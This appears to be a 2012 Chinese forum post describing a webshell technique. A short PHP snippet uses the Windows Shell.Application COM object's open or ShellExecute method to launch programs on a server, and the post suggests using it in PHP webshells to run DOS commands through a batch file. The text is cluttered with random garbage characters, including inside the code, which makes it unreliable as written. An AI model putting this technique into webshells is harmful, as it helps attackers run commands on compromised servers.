关于用Shell.Application来执行程序,在海阳顶端asp木马里已有示例。用的是ShellExecute 这个方法。
* V7 f" ]* O* y+ g! a( U# I5 R- [0 {. ?
今天试了一下,用open也可以。php代码如下,我好像还没有在php的webshell中看到相关方法
5 Q0 o3 L3 Y/ Q9 O# E
0 m: i0 Z! \9 U* l- Y5 K<?php! V) ]4 x5 g2 B' y9 y$ F8 k
$wsh = new COM('Shell.Application') or die("Shell.Application");% V( n- p! y( \1 v {: C/ F
$exec = $wsh->open("c:\\windows\\system32\\notepad.exe");
1 f6 ~! N3 g7 ^- Z, y! f //没有回显,多了个notepad进程,可以写一个批处理来运行dos命令。open换用ShellExecute 也可。
$ w9 U! w. k- \: ^?>- F0 U8 w1 R$ Y
a( _! P9 d" f! t7 M3 D/ Y2 c! W
xp+APMServ5.2.0测试通过。
4 ?( X+ ~' t: Z) j |
发表于 2012-9-15 14:29:01
收藏
支持
反对